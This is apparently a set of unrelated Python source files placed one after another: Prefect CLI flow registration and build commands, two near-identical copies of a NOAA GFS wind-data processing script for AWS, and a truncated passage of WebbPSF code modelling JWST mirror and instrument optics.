"create_flow_from_compressed_string(input: $input)": {"id"} } }, variables=dict(input=inputs), retry_on_api_error=False, ) new_id = res.data.create_flow_from_compressed_string.id if new_id == prev_id: return new_id, prev_version, False else: return new_id, prev_version + 1, True def build_and_register( client: "prefect.Client", flows: "List[FlowLike]", project_id: str, labels: List[str] = None, force: bool = False, schedule: bool = True, ) -> Counter: """Build and register all flows. Args: - client (prefect.Client): the prefect client to use - flows (List[FlowLike]): the flows to register - project_id (str): the project id in which to register the flows - labels (List[str], optional): Any extra labels to set on all flows - force (bool, optional): If false (default), an idempotency key will be used to avoid unnecessary register calls. - schedule (bool, optional): If `True` (default) activates the flow schedule upon registering. Returns: - Counter: stats about the number of successful, failed, and skipped flows. """ # Finish preparing flows to ensure a stable hash later prepare_flows(flows, labels) # Group flows by storage instance. storage_to_flows = defaultdict(list) for flow in flows: storage = flow.storage if isinstance(flow, prefect.Flow) else None storage_to_flows[storage].append(flow) # Register each flow, building storage as needed. # Stats on success/fail/skip rates are kept for later display stats = Counter(registered=0, errored=0, skipped=0) for storage, flows in storage_to_flows.items(): # Build storage if needed if storage is not None: click.echo(f" Building `{type(storage).__name__}` storage...") try: storage.build() except Exception as exc: click.secho(" Error building storage:", fg="red") log_exception(exc, indent=6) red_error = click.style("Error", fg="red") for flow in flows: click.echo(f" Registering {flow.name!r}... {red_error}") stats["errored"] += 1 continue for flow in flows: click.echo(f" Registering {flow.name!r}...", nl=False) try: if isinstance(flow, box.Box): serialized_flow = flow else: serialized_flow = flow.serialize(build=False) flow_id, flow_version, is_new = register_serialized_flow( client=client, serialized_flow=serialized_flow, project_id=project_id, force=force, schedule=schedule, ) except Exception as exc: click.secho(" Error", fg="red") log_exception(exc, indent=4) stats["errored"] += 1 else: if is_new: click.secho(" Done", fg="green") click.echo(f" └── ID: {flow_id}") click.echo(f" └── Version: {flow_version}") stats["registered"] += 1 else: click.secho(" Skipped (metadata unchanged)", fg="yellow") stats["skipped"] += 1 return stats def register_internal( project: str, paths: List[str], modules: List[str], json_paths: List[str] = None, names: List[str] = None, labels: List[str] = None, force: bool = False, schedule: bool = True, in_watch: bool = False, ) -> None: """Do a single registration pass, loading, building, and registering the requested flows. Args: - project (str): the project in which to register the flows. - paths (List[str]): a list of file paths containing flows. - modules (List[str]): a list of python modules containing flows. - json_paths (List[str]): a list of file paths containing serialied flows produced by `prefect build`. - names (List[str], optional): a list of flow names that should be registered. If not provided, all flows found will be registered. - labels (List[str], optional): a list of extra labels to set on all flows. - force (bool, optional): If false (default), an idempotency key will be used to avoid unnecessary register calls. - schedule (bool, optional): If `True` (default) activates the flow schedule upon registering. - in_watch (bool, optional): Whether this call resulted from a `register --watch` call. """ client = prefect.Client() # Determine the project id project_id = get_project_id(client, project) # Load flows from all files/modules requested click.echo("Collecting flows...") source_to_flows = collect_flows( paths, modules, json_paths, names=names, in_watch=in_watch ) # Iterate through each file, building all storage and registering all flows # Log errors as they happen, but only exit once all files have been processed stats = Counter(registered=0, errored=0, skipped=0) for source, flows in source_to_flows.items(): click.echo(f"Processing {source.location!r}:") stats += build_and_register( client, flows, project_id, labels=labels, force=force, schedule=schedule ) # Output summary message registered = stats["registered"] skipped = stats["skipped"] errored = stats["errored"] parts = [click.style(f"{registered} registered", fg="green")] if skipped: parts.append(click.style(f"{skipped} skipped", fg="yellow")) if errored: parts.append(click.style(f"{errored} errored", fg="red")) msg = ", ".join(parts) bar_length = max(60 - len(click.unstyle(msg)), 4) // 2 bar = "=" * bar_length click.echo(f"{bar} {msg} {bar}") # If not in a watch call, exit with appropriate exit code if not in_watch and stats["errored"]: raise TerminalError def watch_for_changes( paths: List[str] = None, modules: List[str] = None, period: float = 0.5, ) -> "Iterator[Tuple[List[str], List[str]]]": """Watch a list of paths and modules for changes. Yields tuples of `(paths, modules)` whenever changes are detected, where `paths` is a list of paths that changed and `modules` is a list of modules that changed. """ paths = list(paths or ()) modules = list(modules or ()) for path in paths: if not os.path.exists(path): raise TerminalError(f"Path {path!r} doesn't exist") if modules: # If modules are provided, we need to convert these to paths to watch. # There's no way in Python to do this without possibly importing the # defining module. As such, we run the command in a temporary process # pool. with multiprocessing.get_context("spawn").Pool(1) as pool: module_paths = pool.apply(get_module_paths, (modules,)) path_to_module = dict(zip(module_paths, modules)) else: path_to_module = {} tracked = paths + list(path_to_module) cache = dict.fromkeys(path_to_module) while True: cache2 = {} for path in tracked: try: try: with os.scandir(path) as directory: for entry in directory: if entry.is_file() and entry.path.endswith(".py"): old_mtime = cache.get(entry.path) mtime = entry.stat().st_mtime if mtime != old_mtime: cache2[entry.path] = mtime except NotADirectoryError: old_mtime = cache.get(path) mtime = os.stat(path).st_mtime if mtime != old_mtime: cache2[path] = mtime except FileNotFoundError: cache.pop(path, None) if cache2: change_paths = [] change_mods = [] for path in cache2: module = path_to_module.get(path) if module is not None: change_mods.append(module) else: change_paths.append(path) if change_paths or change_mods: yield change_paths, change_mods cache.update(cache2) time.sleep(period) REGISTER_EPILOG = """ \bExamples: \b Register all flows found in a directory. \b $ prefect register --project my-project -p myflows/ \b Register a flow named "example" found in `flow.py`. \b $ prefect register --project my-project -p flow.py -n "example" \b Register all flows found in a module named `myproject.flows`. \b $ prefect register --project my-project -m "myproject.flows" \b Register a flow in variable `flow_x` in a module `myproject.flows`. \b $ prefect register --project my-project -m "myproject.flows.flow_x" \b Register all pre-built flows from a remote JSON file. \b $ prefect register --project my-project --json https://some-url/flows.json \b Register all flows in python files found recursively using globbing \b $ prefect register --project my-project --path "**/*" \b Watch a directory of flows for changes, and re-register flows upon change. \b $ prefect register --project my-project -p myflows/ --watch \b Register a flow found in `flow.py` and disable its schedule. \b $ prefect register --project my-project -p flow.py --no-schedule """ @click.group(invoke_without_command=True, epilog=REGISTER_EPILOG) @click.option( "--project", help="The name of the Prefect project to register this flow in. Required.", default=None, ) @click.option( "--path", "-p", "paths", help=( "A path to a file or a directory containing the flow(s) to register. " "May be passed multiple times to specify multiple paths." ), multiple=True, ) @click.option( "--module", "-m", "modules", help=( "A python module name containing the flow(s) to register. May be the full " "import path to a flow. May be passed multiple times to specify multiple " "modules. " ), multiple=True, ) @click.option( "--json", "-j", "json_paths", help=( "A path or URL to a JSON file created by `prefect build` containing the flow(s) " "to register. May be passed multiple times to specify multiple paths. " "Note that this path may be a remote url (e.g. https://some-url/flows.json)." ), multiple=True, ) @click.option( "--name", "-n", "names", help=( "The name of a flow to register from the specified paths/modules. If " "provided, only flows with a matching name will be registered. May be " "passed multiple times to specify multiple flows. If not provided, all " "flows found on all paths/modules will be registered." ), multiple=True, ) @click.option( "--label", "-l", "labels", help=( "A label to add on all registered flow(s). May be passed multiple " "times to specify multiple labels." ), multiple=True, ) @click.option( "--force", "-f", help="Force flow registration, even if the flow's metadata is unchanged.", default=False, is_flag=True, ) @click.option( "--watch", help=( "If set, the specified paths and modules will be monitored and " "registration re-run upon changes." ), default=False, is_flag=True, ) @click.option( "--schedule/--no-schedule", help=( "Toggles the flow schedule upon registering. By default, the " "flow's schedule will be activated and future runs will be created. " "If disabled, the schedule will still be attached to the flow but " "no runs will be created until it is activated." ), default=True, ) @handle_terminal_error def register( project, paths, modules, json_paths, names, labels, force, watch, schedule ): """Register one or more flows into a project. Flows with unchanged metadata will be skipped as registering again will only change the version number. """ if project is None: raise ClickException("Missing required option '--project'") paths = expand_paths(paths) if watch: if any(parse_path(j).scheme != "file" for j in json_paths): raise ClickException("--watch is not supported for remote paths") json_paths = set(json_paths) ctx = multiprocessing.get_context("spawn") for change_paths_temp, change_mods in watch_for_changes( paths=paths, modules=modules ): change_paths = [] change_json_paths = [] for p in change_paths_temp: if p in json_paths: change_json_paths.append(p) else: change_paths.append(p) proc = ctx.Process( target=register_internal, name="prefect-register", args=(project,), kwargs=dict( paths=change_paths, modules=change_mods, json_paths=change_json_paths, names=names, labels=labels, force=force, in_watch=True, schedule=schedule, ), daemon=True, ) proc.start() proc.join() else: modules = list(modules or ()) register_internal( project, paths, modules, json_paths, names, labels, force, schedule ) BUILD_EPILOG = """ \bExamples: \b Build all flows found in a directory. \b $ prefect build -p myflows/ \b Build a flow named "example" found in `flow.py`. \b $ prefect build -p flow.py -n "example" \b Build all flows found in a module named `myproject.flows`. \b $ prefect build -m "myproject.flows" \b Build all flows in python files named `flow.py` found recursively using globbing \b $ prefect register --project my-project -p "**/flow.py" """ @click.command(epilog=BUILD_EPILOG) @click.option( "--path", "-p", "paths", help=( "A path to a file or a directory containing the flow(s) to build. " "May be passed multiple times to specify multiple paths." ), multiple=True, ) @click.option( "--module", "-m", "modules", help=( "A python module name containing the flow(s) to build. May be " "passed multiple times to specify multiple modules." ), multiple=True, ) @click.option( "--name", "-n", "names", help=( "The name of a flow to build from the specified paths/modules. If " "provided, only flows with a matching name will be built. May be " "passed multiple times to specify multiple flows. If not provided, " "all flows found on all paths/modules will be built." ), multiple=True, ) @click.option( "--label", "-l", "labels", help=( "A label to add on all built flow(s). May be passed multiple " "times to specify multiple labels." ), multiple=True, ) @click.option( "--output", "-o", default="flows.json", help="The output path. Defaults to `flows.json`.", ) @click.option( "--update", "-u", is_flag=True, default=False, help="Updates an existing `json` file rather than overwriting it.", ) @handle_terminal_error def build(paths, modules, names, labels, output, update): """Build one or more flows. This command builds all specified flows and writes their metadata to a JSON file. These flows can then be registered without building later by passing the `--json` flag to `prefect register`. """ succeeded = 0 errored = 0 # If updating, load all previously written flows first if update and os.path.exists(output): serialized_flows = {f["name"]: f for f in load_flows_from_json(output)} else: serialized_flows = {} # Collect flows from specified paths & modules paths = expand_paths(list(paths or ())) modules = list(modules or ()) click.echo("Collecting flows...") source_to_flows = collect_flows(paths, modules, [], names=names) for source, flows in source_to_flows.items(): click.echo(f"Processing {source.location!r}:") # Finish preparing flows to ensure a stable hash later prepare_flows(flows, labels) # Group flows by storage instance. storage_to_flows = defaultdict(list) for flow in flows: storage_to_flows[flow.storage].append(flow) for storage, flows in storage_to_flows.items(): # Build storage click.echo(f" Building `{type(storage).__name__}` storage...") try: storage.build() except Exception as exc: click.secho(" Error building storage:", fg="red") log_exception(exc, indent=6) red_error = click.style("Error", fg="red") for flow in flows: click.echo(f" Building {flow.name!r}... {red_error}") errored += 1 continue # Serialize flows for flow in flows: click.echo(f" Building {flow.name!r}...", nl=False) try: serialized_flows[flow.name] = flow.serialize(build=False) except Exception as exc: click.secho(" Error", fg="red") log_exception(exc, indent=4) errored += 1 else: click.secho(" Done", fg="green") succeeded += 1 # Write output file click.echo(f"Writing output to {output!r}") flows = [serialized_flows[name] for name in sorted(serialized_flows)] obj = {"version": 1, "flows": flows} with open(output, "w") as fil: json.dump(obj, fil, sort_keys=True) # Output summary message parts = [click.style(f"{succeeded} built", fg="green")] if errored: parts.append(click.style(f"{errored} errored", fg="red")) msg = ", ".join(parts) bar_length = max(60 - len(click.unstyle(msg)), 4) // 2 bar = "=" * bar_length click.echo(f"{bar} {msg} {bar}") # Exit with appropriate status code if errored: raise TerminalError
import boto3 import rasterio import os import numpy as np from osgeo import gdal from botocore.handlers import disable_signing from typing import List from datetime import datetime DATASET_TMP_PATH = "/tmp/tmp.grib2" GDAL_TMP_FILE = "/tmp/temp.tiff" FINAL_IMG = "/tmp/final.jpeg" NOAA_BUCKET = 'noaa-gfs-bdp-pds' PROCESSED_BUCKET_AP = 'arn:aws:s3:eu-west-1:168000702421:accesspoint/noaa-processing' if ('CDK_NOAA_BUCKET_ID' in os.environ): NOAA_BUCKET = os.environ['CDK_NOAA_BUCKET_ID'] if ('CDK_PROCESSED_BUCKET_AP' in os.environ): PROCESSED_BUCKET_AP = os.environ['CDK_PROCESSED_BUCKET_AP'] def get_file_s3_unsigned(bucket: str, key: str, file_path: str, TEST_ENV=False) -> None: s3 = boto3.resource('s3') gfs_res = s3.Bucket(bucket) # Enable unsigned s3 requests only while not testing # as mocking them is difficult. if (not TEST_ENV): gfs_res.meta.client.meta.events.register('choose-signer.s3.*', disable_signing) gfs_res.download_file(key, file_path) def put_file_s3(bucket: str, key: str, file_path: str) -> None: s3 = boto3.resource('s3') s3.Bucket(bucket).upload_file(file_path, key) # Processes the dataset and returns timestamp as a string. def process_dataset(file_in: str, file_out: str, tmp_file: str, mode: str) -> str: ds = gdal.Open(file_in) ds_time = datetime.utcfromtimestamp( int(ds.GetRasterBand(1).GetMetadataItem('GRIB_VALID_TIME').replace("sec UTC", "")) ) valid_timestring = ds_time.strftime('%Y-%m-%dT%H:%M:%S') # if ds_time is more than 12 hours in the future, discard it # this should be parsed directly from the filename, but this works out too if (ds_time - datetime.utcnow()).total_seconds() > 12 * 60 * 60: return { "status": "noop", "valid_timestring": valid_timestring, } ugrd = "UGRD" vgrd = "VGRD" bands = None if (mode == "wind"): bands = [ { # U component of wind (m/s) "GRIB_ELEMENT": ugrd, "GRIB_SHORT_NAME": "10-HTGL" }, { # V component of wind (m/s) "GRIB_ELEMENT": vgrd, "GRIB_SHORT_NAME": "10-HTGL" }, ] band_indexes = {} for i in range(1, ds.RasterCount + 1): band = ds.GetRasterBand(i) grib_element = band.GetMetadata()['GRIB_ELEMENT'] grib_short_name = band.GetMetadata()['GRIB_SHORT_NAME'] for (band_idx, band_dict) in enumerate(bands): if (grib_element == band_dict['GRIB_ELEMENT'] and grib_short_name == band_dict['GRIB_SHORT_NAME']): band_indexes[grib_element] = i break in_srs = "+proj=longlat +datum=WGS84 +lon_wrap=180" out_srs = "EPSG:3857" band_indexes_keys = band_indexes.values() # pick the bands we want from grib file translated = gdal.Translate("", ds, bandList=band_indexes_keys, format="VRT") # reproject to epsg:3857 and cut to sensible bounds (taken manually from qgis osm layer) bounds = [-20037508.3427892439067364,-20037508.3427892550826073,20037508.3427892439067364,20037508.3427892439067364] # write reprojected file to tmp file so we can pick bands we want with rasterio warped = gdal.Warp(tmp_file, translated, dstNodata=9999, srcSRS=in_srs, dstSRS=out_srs, outputBounds=bounds, creationOptions=["COMPRESS=LZW"]) # write dataset to disk del warped del translated # only 512mb of disk space is available for lambda, so deletion here might be necessary # os.unlink(file_in) with rasterio.open(tmp_file) as src: with rasterio.open(file_out, "w", width=src.shape[0], height=src.shape[1], count=3, dtype='uint8') as dst: if (mode == "wind"): # rasterio band indexing starts from 0 u_index = [index for index, value in enumerate(band_indexes) if value == ugrd][0] + 1 v_index = [index for index, value in enumerate(band_indexes) if value == vgrd][0] + 1 u_raw = src.read(u_index) v_raw = src.read(v_index) u_rescaled = np.interp(u_raw, (-50, 50), (0, 255)).astype(np.uint8) v_rescaled = np.interp(v_raw, (-50, 50), (0, 255)).astype(np.uint8) # In a sense this band three is completely redundant, but WebGL lookup from a picture # like this was easier, so keeping it this way for now. speed = np.sqrt(src.read(u_index)**2 + src.read(v_index)**2).astype(np.uint8) dst.write(u_rescaled, 1) dst.write(v_rescaled, 2) dst.write(speed, 3) else: print("Mode not supported") return { "status": "update", "valid_timestring": valid_timestring, } def delete_files_if_exists(files: List[str]) -> None: for f in files: if os.path.exists(f): os.unlink(f) def key_is_fresh_enough(key: str) -> bool: # gfs.20210226/18/gfs.t18z.sfluxgrbf010.grib2 hours = int(key.split("sfluxgrbf")[1].split(".")[0]) return hours < 24 def handle_new_gfs(key: str): if not key_is_fresh_enough(key): print("Hour more than 24h in the future, skipping" + key) return # If we get same execution context as from previous lambda invocation, # we might have unncessary files there filling up the 512M limit on /tmp. delete_files_if_exists([DATASET_TMP_PATH, GDAL_TMP_FILE, FINAL_IMG]) get_file_s3_unsigned(NOAA_BUCKET, key, DATASET_TMP_PATH) for mode in ["wind"]: result = process_dataset(DATASET_TMP_PATH, FINAL_IMG, GDAL_TMP_FILE, "wind") if (result["status"] == "update"): output_key = f'{result['valid_timestring']}_noaa_{mode}.jpeg' put_file_s3(PROCESSED_BUCKET_AP, output_key, FINAL_IMG) else: print("Not updating, too far in the future")
import boto3 import rasterio import os import numpy as np from osgeo import gdal from botocore.handlers import disable_signing from typing import List from datetime import datetime DATASET_TMP_PATH = "/tmp/tmp.grib2" GDAL_TMP_FILE = "/tmp/temp.tiff" FINAL_IMG = "/tmp/final.jpeg" NOAA_BUCKET = 'noaa-gfs-bdp-pds' PROCESSED_BUCKET_AP = 'arn:aws:s3:eu-west-1:168000702421:accesspoint/noaa-processing' if ('CDK_NOAA_BUCKET_ID' in os.environ): NOAA_BUCKET = os.environ['CDK_NOAA_BUCKET_ID'] if ('CDK_PROCESSED_BUCKET_AP' in os.environ): PROCESSED_BUCKET_AP = os.environ['CDK_PROCESSED_BUCKET_AP'] def get_file_s3_unsigned(bucket: str, key: str, file_path: str, TEST_ENV=False) -> None: s3 = boto3.resource('s3') gfs_res = s3.Bucket(bucket) # Enable unsigned s3 requests only while not testing # as mocking them is difficult. if (not TEST_ENV): gfs_res.meta.client.meta.events.register('choose-signer.s3.*', disable_signing) gfs_res.download_file(key, file_path) def put_file_s3(bucket: str, key: str, file_path: str) -> None: s3 = boto3.resource('s3') s3.Bucket(bucket).upload_file(file_path, key) # Processes the dataset and returns timestamp as a string. def process_dataset(file_in: str, file_out: str, tmp_file: str, mode: str) -> str: ds = gdal.Open(file_in) ds_time = datetime.utcfromtimestamp( int(ds.GetRasterBand(1).GetMetadataItem('GRIB_VALID_TIME').replace("sec UTC", "")) ) valid_timestring = ds_time.strftime('%Y-%m-%dT%H:%M:%S') # if ds_time is more than 12 hours in the future, discard it # this should be parsed directly from the filename, but this works out too if (ds_time - datetime.utcnow()).total_seconds() > 12 * 60 * 60: return { "status": "noop", "valid_timestring": valid_timestring, } ugrd = "UGRD" vgrd = "VGRD" bands = None if (mode == "wind"): bands = [ { # U component of wind (m/s) "GRIB_ELEMENT": ugrd, "GRIB_SHORT_NAME": "10-HTGL" }, { # V component of wind (m/s) "GRIB_ELEMENT": vgrd, "GRIB_SHORT_NAME": "10-HTGL" }, ] band_indexes = {} for i in range(1, ds.RasterCount + 1): band = ds.GetRasterBand(i) grib_element = band.GetMetadata()['GRIB_ELEMENT'] grib_short_name = band.GetMetadata()['GRIB_SHORT_NAME'] for (band_idx, band_dict) in enumerate(bands): if (grib_element == band_dict['GRIB_ELEMENT'] and grib_short_name == band_dict['GRIB_SHORT_NAME']): band_indexes[grib_element] = i break in_srs = "+proj=longlat +datum=WGS84 +lon_wrap=180" out_srs = "EPSG:3857" band_indexes_keys = band_indexes.values() # pick the bands we want from grib file translated = gdal.Translate("", ds, bandList=band_indexes_keys, format="VRT") # reproject to epsg:3857 and cut to sensible bounds (taken manually from qgis osm layer) bounds = [-20037508.3427892439067364,-20037508.3427892550826073,20037508.3427892439067364,20037508.3427892439067364] # write reprojected file to tmp file so we can pick bands we want with rasterio warped = gdal.Warp(tmp_file, translated, dstNodata=9999, srcSRS=in_srs, dstSRS=out_srs, outputBounds=bounds, creationOptions=["COMPRESS=LZW"]) # write dataset to disk del warped del translated # only 512mb of disk space is available for lambda, so deletion here might be necessary # os.unlink(file_in) with rasterio.open(tmp_file) as src: with rasterio.open(file_out, "w", width=src.shape[0], height=src.shape[1], count=3, dtype='uint8') as dst: if (mode == "wind"): # rasterio band indexing starts from 0 u_index = [index for index, value in enumerate(band_indexes) if value == ugrd][0] + 1 v_index = [index for index, value in enumerate(band_indexes) if value == vgrd][0] + 1 u_raw = src.read(u_index) v_raw = src.read(v_index) u_rescaled = np.interp(u_raw, (-50, 50), (0, 255)).astype(np.uint8) v_rescaled = np.interp(v_raw, (-50, 50), (0, 255)).astype(np.uint8) # In a sense this band three is completely redundant, but WebGL lookup from a picture # like this was easier, so keeping it this way for now. speed = np.sqrt(src.read(u_index)**2 + src.read(v_index)**2).astype(np.uint8) dst.write(u_rescaled, 1) dst.write(v_rescaled, 2) dst.write(speed, 3) else: print("Mode not supported") return { "status": "update", "valid_timestring": valid_timestring, } def delete_files_if_exists(files: List[str]) -> None: for f in files: if os.path.exists(f): os.unlink(f) def key_is_fresh_enough(key: str) -> bool: # gfs.20210226/18/gfs.t18z.sfluxgrbf010.grib2 hours = int(key.split("sfluxgrbf")[1].split(".")[0]) return hours < 24 def handle_new_gfs(key: str): if not key_is_fresh_enough(key): print("Hour more than 24h in the future, skipping" + key) return # If we get same execution context as from previous lambda invocation, # we might have unncessary files there filling up the 512M limit on /tmp. delete_files_if_exists([DATASET_TMP_PATH, GDAL_TMP_FILE, FINAL_IMG]) get_file_s3_unsigned(NOAA_BUCKET, key, DATASET_TMP_PATH) for mode in ["wind"]: result = process_dataset(DATASET_TMP_PATH, FINAL_IMG, GDAL_TMP_FILE, "wind") if (result["status"] == "update"): output_key = f'{result["valid_timestring"]}_noaa_{mode}.jpeg' put_file_s3(PROCESSED_BUCKET_AP, output_key, FINAL_IMG) else: print("Not updating, too far in the future")
import os import poppy import poppy.utils import numpy as np import matplotlib import matplotlib.pyplot as plt from astropy.table import Table import astropy.io.fits as fits import astropy.units as units from scipy.interpolate import griddata, RegularGridInterpolator from scipy.ndimage import rotate from . import utils from . import constants import logging _log = logging.getLogger('webbpsf') import pysiaf ####### Classes for modeling aspects of JWST's segmented active primary ##### def segment_zernike_basis(segnum=1, nterms=15, npix=512, outside=np.nan): """ Basis set in the style of poppy.zernike.zernike_basis for segment-level Zernike polynomials for one segment at a time in JWST's aperture. Parameters ------------ segnum : integer 1 to 18, number of JWST segment. Uses same numbering convention as the WSS. nterms : integer Number of Zernike polynomial terms to return npix : integer Number of pixels per side of the array outside : float Value to fill the array with outside of the valid segment. """ from .webbpsf_core import segname aper = WebbPrimaryAperture(label_segments=True) w = poppy.Wavefront( npix=npix, diam=constants.JWST_CIRCUMSCRIBED_DIAMETER ) segmask = aper.get_transmission(w) segname = segname(segnum) cenx, ceny = aper.seg_centers[segname] # nominal point to point diam for A and B segments; # ignoring slight departures from ideal hexes for now. seg_radius = constants.JWST_SEGMENT_RADIUS y, x = w.coordinates() r = np.sqrt((y - ceny) ** 2 + (x - cenx) ** 2) / seg_radius theta = np.arctan2((y - ceny) / seg_radius, (x - cenx) / seg_radius) r[segmask != segnum] = np.nan theta[segmask != segnum] = np.nan wg = np.where(segmask == segnum) outzerns = np.full((nterms, npix, npix), outside, dtype=float) outzerns_tmp = poppy.zernike.zernike_basis( nterms=nterms, rho=r[wg], theta=theta[wg], outside=outside ) for iz in range(nterms): outzerns[iz][wg] = outzerns_tmp[iz] return outzerns class WebbPrimaryAperture(poppy.AnalyticOpticalElement): """ The JWST telescope primary mirror geometry, in all its hexagonal obscured complexity. Note this has **just the aperture shape** and not any wavefront error terms. JWST design pupil geometry and segment coordinates taken from Paul Lightsey's spreadsheet: "2010.03.16 Transmission X Area Budget.xls". That document was in turn based on Ball Aerospace drawing 2220169 Rev B, and the OTE Cryogenic Optics ICD, BATC doc # C327693. This class has no wavefront errors, it's just the pupil geometry including the segments (which are not quite perfect hexagons for manufacturing reasons related to trying to tile a curved surface with hexagons while maintaining uniform clearance between adjacent segments) and the secondary mirror support struts, including the bumps on the +V3 strut for the mid boom hinge and mag dampers. .. warning:: At high sampling factors, PSF calculations become a LOT slower. By default, this produces an aperture with values 0 and 1 for the transmission. By setting the parameter label_segments=True, you can instead have it generate a map of which segment number is in which location. """ def __init__(self, name="WebbPrimaryAperture", label_segments=False, **kwargs): super(WebbPrimaryAperture, self).__init__(name=name, **kwargs) self.label_segments = label_segments self.segdata = constants.JWST_PRIMARY_SEGMENTS self.strutdata = constants.JWST_PRIMARY_STRUTS self.seg_centers = dict(constants.JWST_PRIMARY_SEGMENT_CENTERS) def get_transmission(self, wave): segpaths = {} strutpaths = [] for segname, vertices in self.segdata: segpaths[segname] = matplotlib.path.Path(vertices) for strutname, vertices in self.strutdata: strutpaths.append(matplotlib.path.Path(vertices)) y, x = wave.coordinates() pts = np.asarray([a for a in zip(x.flat, y.flat)]) npix = wave.shape[0] out = np.zeros((npix, npix)) # paint the segments 1 but leave out the SMSS struts for segname, p in segpaths.items(): res = p.contains_points(pts) res.shape = (npix, npix) out[res] = 1 if not self.label_segments else int(segname.split('-')[1]) for p in strutpaths: res = p.contains_points(pts) res.shape = (npix, npix) out[res] = 0 return out # Note - the following is **NOT USED YET ** # This will be finished up and used in a subsequent release to # apply the OTE field dependence. For now just the fixed per SI stuff # is there. class WebbOTEPupil(poppy.FITSOpticalElement): """The complex OTE pupil, including: 1) the aperture geometry, based on the cryo ICD detailed coordinates 2) high spatial frequency WFE from the as-built mirrors in Rev G optical model 3) mid frequencies from Rev W optical budget 4) low frequency field-dependent WFE from the Rev G optical model. Parameters ----------- level : ' """ def __init__(self, instrument=None, level='requirements', opd_index=0, **kwargs): if instrument is not None: self.instrument = instrument self.instr_name = instrument.name self.tel_coords = instrument._tel_coords() else: self.instrument = None self.instr_name = "NIRCam" # TODO figure out default V2V3 coords here self.tel_coords = (0, 0) # ? TODO # determine filename for pupil amplitude array aperture_file = 'jwst_pupil_revW_npix1024.fits.gz' aperture_file = os.path.abspath(os.path.join( utils.get_webbpsf_data_path(), aperture_file )) # determine filename for the OPD array # This should contain a precomputed combination of # Rev G high spatial frequencies and # Rev W mid spatial frequencies # Depends on what the 'level' parameter is. if level == 'perfect': opd_file = os.path.join( utils.get_webbpsf_data_path(), 'OPD_jwst_ote_perfectly_aligned.fits' ) elif level in ('predicted', 'requirements'): opd_file = os.path.join( utils.get_webbpsf_data_path(), self.instr_name, 'OPD', 'OPD_RevW_ote_for_{}_{}.fits'.format(self.instr_name, level) ) else: raise ValueError("Invalid/unknown wavefront error level") super(WebbOTEPupil, self).__init__(name='JWST Primary', transmission=aperture_file, opd=opd_file, **kwargs) if self.instrument is not None: # we need a field point to be able to use this so # just skip it if we don't have one. # determine Zernike coeffs for field dependent error # based on Rev G field dependence model. coeffs = np.zeros(22) self.zernike_coeffs = coeffs # TODO apply that to as a modification to the OPD array. ####### Custom Optics used in JWInstrument classes ##### class NIRSpec_three_MSA_shutters(poppy.AnalyticOpticalElement): """ Three NIRSpec MSA shutters, adjacent vertically.""" def get_transmission(self, wave): """ Compute the transmission inside/outside of the field stop. The area of an open shutter is 0.2 x 0.45, while the shutter pitch is 0.26x0.51 The walls separating adjacent shutters are 0.06 arcsec wide. """ msa_width = 0.2 msa_height = 0.45 msa_wall = 0.06 if not isinstance(wave, poppy.Wavefront): raise ValueError("get_transmission must be called with a Wavefront to define the spacing") assert (wave.planetype == poppy.poppy_core._IMAGE) y, x = wave.coordinates() self.transmission = np.zeros(wave.shape) # get the innermost shutter than spans the Y axis w_inside_1 = np.where((abs(y) < (msa_height / 2)) & (abs(x) < (msa_width / 2))) self.transmission[w_inside_1] = 1 # get the adjacent shutters one above and one below. w_inside_2 = np.where((abs(y) > (msa_height / 2) + msa_wall) & (abs(y) < msa_height * 1.5 + msa_wall) & (abs(x) < (msa_width / 2))) self.transmission[w_inside_2] = 1 return self.transmission class NIRSpec_MSA_open_grid(poppy.AnalyticOpticalElement): """ An infinite repeating region of the NIRSpec MSA grid""" def get_transmission(self, wave): """ Compute the transmission inside/outside of the field stop. The area of an open shutter is 0.2 x 0.45, while the shutter pitch is 0.26x0.51 The walls separating adjacent shutters are 0.06 arcsec wide. """ msa_width = 0.2 msa_height = 0.45 msa_wall = 0.06 msa_x_pitch = 0.26 msa_y_pitch = 0.51 if not isinstance(wave, poppy.Wavefront): raise ValueError("get_transmission must be called with a Wavefront to define the spacing") assert (wave.planetype == poppy.poppy_core._IMAGE) y, x = wave.coordinates() # xnew = x*np.cos(np.deg2rad(self.angle)) + y*np.sin(np.deg2rad(self.angle)) # ynew = -x*np.sin(np.deg2rad(self.angle)) + y*np.cos(np.deg2rad(self.angle)) # x,y = xnew, ynew mask_vert_walls = np.abs(np.mod(np.abs(x), msa_x_pitch) - (msa_x_pitch / 2)) < msa_wall / 2 mask_horz_walls = np.abs(np.mod(np.abs(y), msa_y_pitch) - (msa_y_pitch / 2)) < msa_wall / 2 self.transmission = np.ones(wave.shape) self.transmission[mask_vert_walls] = 0 self.transmission[mask_horz_walls] = 0 return self.transmission class NIRISS_GR700XD_Grism(poppy.AnalyticOpticalElement): """ Custom optic class to model the NIRISS SOSS grim GR700XD This includes both the pupil mask file and the cylindrical lens Based on inputs from Loic Albert, Anand Sivaramakrishnan, and Andre Martel In particular see FGS_TFI_UdM_035_RevD for details of the NIRISS GR700XD measurement, and JWST-STScI-003338 for detector orientation and layout. GRISM DESIGN: The grism (and cylinder) are per design rotated by 2 degrees so as to be able to sample an emission line across different pixel position along the spatial direction (kind of resampling the line and not be limited by intra pixel response). From Loic Albert's NIRISS technical report: * surface sag for the cylinder: 3.994 micron peak * limited to 3.968 microns for the 26 mm FOV mask From Loic Albert's email to Marshall 2013-07-18: I do have an update concerning the geometry of the GR700XD pupil mask. It turns out that they clocked the grism by about 2.25 degrees wrt the OTE system of coordinates. However, the field mask did not follow and is still aligned along the OTE s.o.c. That was a mistake that fortunately does have much impact. Comdev is in the process of modelling a new mask for the Spare grism. Remember that we will swap the current FLight GR700XD for its Spare which offers much improved performances. The mask size will be a little different (rectangular) and this time will be clocked 2.25 degrees along with the grism. The sign of the rotation of the grism will have to be devised by trying the 2 possibilities an looking at the resulting tilt of the monochromatic PSF and the position of that PSF on the detector. Attached is a simulation of what we expect based on my own PSF generator. The cylinder lens has a well characterized power (actually radius of curvature). The values are: current Flight: 22.85 meters Spare: 22.39 meters Prism physical size: pupil is 26 mm on a side for the current prism, will be 28 mm for the spare From Loic Albert's email to Marshall 2013-09-19: The latest news on this front are: 1 - The current Flight mask is attached. It is 26x26 mm. The mask and grism are *not* aligned along the same coordinates. That was a mistake. I'll forward you a message from Michael M., our optics expert at CSA. 2 - The Spare mask (likely the one which will fly) is not built yet. The mask will be aligned along the grism coordinate and both will be clocked 2.2 deg wrt the OTE. 3 - A ghost analysis showed that the current grism clocking will suffer from large ghosts. So we are studying how to clock the Spare grism in its cell to 